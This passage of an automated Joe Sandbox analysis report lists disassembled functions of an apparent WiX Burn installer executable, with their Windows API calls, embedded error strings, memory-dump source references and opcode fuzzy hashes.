                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: File$CloseCreateDecryptErrorHandleLast
                                                                                                                                                          • String ID: Container has no verification information: %ls$Failed to open container at path: %ls$Failed to verify hash of container: %ls$d:\a\wix\wix\src\burn\engine\cache.cpp
                                                                                                                                                          • API String ID: 3262865546-512814969
                                                                                                                                                          • Opcode ID: ff47f3cf072607278ed1bc0925a80f00eba1a3f33df97d90c9438b19af1de155
                                                                                                                                                          • Instruction ID: b611ea3eeea541e8fb6135e76432165d3e08f52fa6aec208084692841c595b3e
                                                                                                                                                          • Opcode Fuzzy Hash: ff47f3cf072607278ed1bc0925a80f00eba1a3f33df97d90c9438b19af1de155
                                                                                                                                                          • Instruction Fuzzy Hash: AB31E9316C0215BBE722AA988C8BFDF3A15AF04B55F200117FA05792D0D2BDA9D0D6DD
                                                                                                                                                          Function 004035CE Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 79windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • FormatMessageW.KERNEL32(-000011F7,00000008,?,00000000,00000000,00000000,00000000,80070656,?,?,?,0042BD83,00000000,00000008,00000000,80070656), ref: 004035FF
                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,0042BD83,00000000,00000008,00000000,80070656,?,?,00419C65,00610076,?,80070656,00000000,?), ref: 0040360C
                                                                                                                                                          • LocalFree.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,0042BD83,00000000,00000008,00000000,80070656,?,?,00419C65,00610076), ref: 00403690
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorFormatFreeLastLocalMessage
                                                                                                                                                          • String ID: Failed to allocate string for message.$Failed to format message for error: 0x%x$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\strutil.cpp
                                                                                                                                                          • API String ID: 1365068426-1061171861
                                                                                                                                                          • Opcode ID: 63d26adae90b94018b2cc74de0d652b00c96cb35b5a8537fba5e4b9b63b0a1e0
                                                                                                                                                          • Instruction ID: 5727c06d9320c0c77c35bbf621c6cb31a4d2634cec43fef6c4577a8765e5ef23
                                                                                                                                                          • Opcode Fuzzy Hash: 63d26adae90b94018b2cc74de0d652b00c96cb35b5a8537fba5e4b9b63b0a1e0
                                                                                                                                                          • Instruction Fuzzy Hash: F621C6B2D40229BBDB219F94DC09FDF3E6CEB04755F11417ABD08F6291E6798E0086E8
                                                                                                                                                          Function 0046E9BB Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 73pipeCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • CreateNamedPipeW.KERNEL32(00000000,00080003,00000000,00000001,00010000,00010000,00000001,00000000,00000000,00000000), ref: 0046EA14
                                                                                                                                                          • GetLastError.KERNEL32 ref: 0046EA21
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CreateErrorLastNamedPipe
                                                                                                                                                          • String ID: Failed to allocate full name of pipe: %ls$Failed to create pipe: %ls$\\.\pipe\%ls$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\pipeutil.cpp
                                                                                                                                                          • API String ID: 4201769729-2709686045
                                                                                                                                                          • Opcode ID: 189c5b1d43bad1b3295600e5be8395f8a3dc9ceb920962227614a2a109f2b0bd
                                                                                                                                                          • Instruction ID: 06d6254b60c8b9cc8a1941fd85825239588ecbeb7b648a11d5aef6b27fe2e4e2
                                                                                                                                                          • Opcode Fuzzy Hash: 189c5b1d43bad1b3295600e5be8395f8a3dc9ceb920962227614a2a109f2b0bd
                                                                                                                                                          • Instruction Fuzzy Hash: 49115036A80214B7DB316A91CC0BF9F3B54AB01B21F504166FE00BA2D1E2BD4E50D799
                                                                                                                                                          Function 0046F128 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 56comCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • CLSIDFromProgID.OLE32(Microsoft.Update.AutoUpdate,200001A4,00000000,00000000,00000000,200001A4,?,00429A82,00000000), ref: 0046F150
                                                                                                                                                          • CoCreateInstance.OLE32(00000000,00000000,00000001,004ADDF0,00000000,?,00429A82,00000000), ref: 0046F178
                                                                                                                                                          Strings
                                                                                                                                                          • d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\wuautil.cpp, xrefs: 0046F190
                                                                                                                                                          • Failed to create instance of Microsoft.Update.AutoUpdate., xrefs: 0046F184
                                                                                                                                                          • Failed to get CLSID for Microsoft.Update.AutoUpdate., xrefs: 0046F15C
                                                                                                                                                          • Microsoft.Update.AutoUpdate, xrefs: 0046F14B
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CreateFromInstanceProg
                                                                                                                                                          • String ID: Failed to create instance of Microsoft.Update.AutoUpdate.$Failed to get CLSID for Microsoft.Update.AutoUpdate.$Microsoft.Update.AutoUpdate$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\wuautil.cpp
                                                                                                                                                          • API String ID: 2151042543-1828807226
                                                                                                                                                          • Opcode ID: 1a6b00397aad7c63e1783f218b7d2c2afee73fdfb2ec1ae6ff289c5199499e01
                                                                                                                                                          • Instruction ID: 9b42c38b03cfb0160408c1088280dc656ce9f0bbfd80e5f511da7e268f3b940d
                                                                                                                                                          • Opcode Fuzzy Hash: 1a6b00397aad7c63e1783f218b7d2c2afee73fdfb2ec1ae6ff289c5199499e01
                                                                                                                                                          • Instruction Fuzzy Hash: 9C01B971B807147BD7109668DC46FAB76689715B91F500036FE05FB1D0E5A49D04C6AA
                                                                                                                                                          Function 0045F10B Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1473COMMONLIBRARYCODE
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: __floor_pentium4
                                                                                                                                                          • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                          • API String ID: 4168288129-2761157908
                                                                                                                                                          • Opcode ID: 6cbe9d667d0cced1b1db7d963504bd4cb555dda5a89d49737e17f8d82eb215db
                                                                                                                                                          • Instruction ID: 991b03630b9555bab1a4770f51431c977b966d452484309af11d647ec86cb40d
                                                                                                                                                          • Opcode Fuzzy Hash: 6cbe9d667d0cced1b1db7d963504bd4cb555dda5a89d49737e17f8d82eb215db
                                                                                                                                                          • Instruction Fuzzy Hash: 61D25B71E082288FDB65CE28DD447EAB7B5EB45305F1441EBD80DE3241E778AE898F46
                                                                                                                                                          Function 00420480 Relevance: 9.1, Strings: 7, Instructions: 315COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          • Failed to check if "ALL" was set in IGNOREDEPENDENCIES., xrefs: 0042055F
                                                                                                                                                          • d:\a\wix\wix\src\burn\engine\dependency.cpp, xrefs: 0042052B, 0042083B
                                                                                                                                                          • Failed to add the package provider key "%ls" to the planned list., xrefs: 00420829
                                                                                                                                                          • ALL, xrefs: 0042053D
                                                                                                                                                          • Failed to build the list of ignored dependents., xrefs: 00420519
                                                                                                                                                          • comres.dll, xrefs: 004205A6
                                                                                                                                                          • Failed to check the dictionary of ignored dependents., xrefs: 004206CD
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: ALL$Failed to add the package provider key "%ls" to the planned list.$Failed to build the list of ignored dependents.$Failed to check if "ALL" was set in IGNOREDEPENDENCIES.$Failed to check the dictionary of ignored dependents.$comres.dll$d:\a\wix\wix\src\burn\engine\dependency.cpp
                                                                                                                                                          • API String ID: 0-2150047137
                                                                                                                                                          • Opcode ID: 6209f3c2b4768a2ef84d212aca16cc73ea109356ca73680f81d24e10f9019fbf
                                                                                                                                                          • Instruction ID: fccc6b539feccfc60608c15a8bd72e201c44fd5a5f3ade842a861b89230bf9b3
                                                                                                                                                          • Opcode Fuzzy Hash: 6209f3c2b4768a2ef84d212aca16cc73ea109356ca73680f81d24e10f9019fbf
                                                                                                                                                          • Instruction Fuzzy Hash: 33C1A870A007249FEB20DF51D880BABB7F1BF98314F60456FD54967262D778A882CF58
                                                                                                                                                          Function 0041D64B Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 118fileCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • FindFirstFileW.KERNEL32(?,?,?,?,*.*,?,?,?,.unverified,?), ref: 0041D6F9
                                                                                                                                                          • FindNextFileW.KERNEL32(00000000,00000010,?,?,*.*,?,?,?,.unverified,?), ref: 0041D792
                                                                                                                                                          • FindClose.KERNEL32(00000000,?,?,*.*,?,?,?,.unverified,?), ref: 0041D7A1
                                                                                                                                                            • Part of subcall function 00401D86: GetFileAttributesW.KERNEL32(00000001,?,?,?,?,00000000,00000000), ref: 00401DEE
                                                                                                                                                            • Part of subcall function 00401D86: GetLastError.KERNEL32(?,?,?,?,00000000,00000000), ref: 00401DFF
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: FileFind$AttributesCloseErrorFirstLastNext
                                                                                                                                                          • String ID: *.*$.unverified
                                                                                                                                                          • API String ID: 3458812364-2528915496
                                                                                                                                                          • Opcode ID: e916c6c94bd883675b2ec1d6df5dbf2a0384ed65a0abdd9179abc8659eb02bf2
                                                                                                                                                          • Instruction ID: 408372663a2dc580efef92c13a082c737f537d7f678f925cf3fd9d1462d9fe36
                                                                                                                                                          • Opcode Fuzzy Hash: e916c6c94bd883675b2ec1d6df5dbf2a0384ed65a0abdd9179abc8659eb02bf2
                                                                                                                                                          • Instruction Fuzzy Hash: 5E4192B1D00628AACB20BB61CD89BEF7778AF44705F1041ABF918A61D1D7789EC4CF58
                                                                                                                                                          Function 0040AAD0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 67COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorLastNameUser
                                                                                                                                                          • String ID: Failed to get the user name.$Failed to set variant value.$d:\a\wix\wix\src\burn\engine\variable.cpp
                                                                                                                                                          • API String ID: 2054405381-3920010817
                                                                                                                                                          • Opcode ID: f3ae558bca10a9d4a8410607ee672f7cedc592d53f413517f2b5e06a64d42a8f
                                                                                                                                                          • Instruction ID: 7b4aafa6607927b588c942c758411635dc5dac1fbe723c54996afdda4ceafd32
                                                                                                                                                          • Opcode Fuzzy Hash: f3ae558bca10a9d4a8410607ee672f7cedc592d53f413517f2b5e06a64d42a8f
                                                                                                                                                          • Instruction Fuzzy Hash: 1611C871A4032877D721AA158C4AFAB776C9B00764F50427BFD04B72C1EA7CAD4086EA
                                                                                                                                                          Function 004445B2 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 49COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000003,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00444551,00000000,00000003), ref: 004445C9
                                                                                                                                                          • GetLastError.KERNEL32(?,00444551,00000000,00000003,00000000,?,?,?,?,?,?,?,?,?,004449C3,?), ref: 004445D3
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ChangeConfigErrorLastService
                                                                                                                                                          • String ID: Failed to set service start type.$d:\a\wix\wix\src\burn\engine\msuengine.cpp
                                                                                                                                                          • API String ID: 1456623077-792143866
                                                                                                                                                          • Opcode ID: 83b8f43af9642eaf01bcc878b66a74c2286c60889a8f4a6045667ad7e59b5586
                                                                                                                                                          • Instruction ID: 87868150c73a105c2f8137e26c36cded8f9095487da897f112e0e46259accee7
                                                                                                                                                          • Opcode Fuzzy Hash: 83b8f43af9642eaf01bcc878b66a74c2286c60889a8f4a6045667ad7e59b5586
                                                                                                                                                          • Instruction Fuzzy Hash: 1CF0BB33A4013437E62125595C45F577E1CDB42BB5F524336FE18F62D1D6288C0042F8
                                                                                                                                                          Function 0045EC60 Relevance: 6.5, APIs: 4, Instructions: 455COMMONLIBRARYCODE
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 4a2933c6efb17ff4954354204e5574c5a496e5015f06b6959cd73f373da724c1
                                                                                                                                                          • Instruction ID: f44654bca15fe9f57f10f0ac5946471ceea412dc94b2c705be801bfab338c074
                                                                                                                                                          • Opcode Fuzzy Hash: 4a2933c6efb17ff4954354204e5574c5a496e5015f06b6959cd73f373da724c1
                                                                                                                                                          • Instruction Fuzzy Hash: BC024F71E002199FDF14CFA9C9806AEF7B1FF48315F24816AD919E7382D735AA09CB94
                                                                                                                                                          Function 00407C78 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • VirtualQuery.KERNEL32(?,?,0000001C), ref: 00407C89
                                                                                                                                                          • GetSystemInfo.KERNEL32(?), ref: 00407CA4
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InfoQuerySystemVirtual
                                                                                                                                                          • String ID: D
                                                                                                                                                          • API String ID: 401686933-2746444292
                                                                                                                                                          • Opcode ID: 48e5a51665b371be01d0ba3d1c8f8db1ccbfcf10859a74d70b5dec09c1c9685f
                                                                                                                                                          • Instruction ID: 86e64882e0e6762be4dfed7664c11750bd74e8723d9e0dddae3f8a3dab5a3ade
                                                                                                                                                          • Opcode Fuzzy Hash: 48e5a51665b371be01d0ba3d1c8f8db1ccbfcf10859a74d70b5dec09c1c9685f
                                                                                                                                                          • Instruction Fuzzy Hash: 8201F772A041096BDB14DE29DC05BDE7BAAAFC4324F0CC231AD19E7291E638E9518694
                                                                                                                                                          Function 0041DC0A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28fileCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0040241C: CreateDirectoryW.KERNELBASE(00000000,0040951C,?,00000000,?,0041DD2E,00000000,00000000,?,version.dll,00000000,0040951C,00000000,0040960C,?,00000001), ref: 0040242A
                                                                                                                                                            • Part of subcall function 0040241C: GetLastError.KERNEL32(?,0041DD2E,00000000,00000000,?,version.dll,00000000,0040951C,00000000,0040960C,?,00000001), ref: 00402438
                                                                                                                                                          • DecryptFileW.ADVAPI32(?,00000000), ref: 0041DC4E
                                                                                                                                                          Strings
                                                                                                                                                          • d:\a\wix\wix\src\burn\engine\cache.cpp, xrefs: 0041DC37
                                                                                                                                                          • Failed create acquisition folder., xrefs: 0041DC25
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CreateDecryptDirectoryErrorFileLast
                                                                                                                                                          • String ID: Failed create acquisition folder.$d:\a\wix\wix\src\burn\engine\cache.cpp
                                                                                                                                                          • API String ID: 4153065963-4098110870
                                                                                                                                                          • Opcode ID: 488ee8028b0bed482d1a6d9a417e47464f72536fee87483eaa9de901bb8e1dca
                                                                                                                                                          • Instruction ID: c1246b6a56e5a7b9ca52fe22d309f4493cbee6c65a54f01b572ee4631ada90b1
                                                                                                                                                          • Opcode Fuzzy Hash: 488ee8028b0bed482d1a6d9a417e47464f72536fee87483eaa9de901bb8e1dca
                                                                                                                                                          • Instruction Fuzzy Hash: 6EE09272B80221B3E1212595CC07FC6FB189B51F62F100123F708B61E1A6F4685082ED
                                                                                                                                                          Function 004581CE Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 004582C6
                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 004582D0
                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 004582DD
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
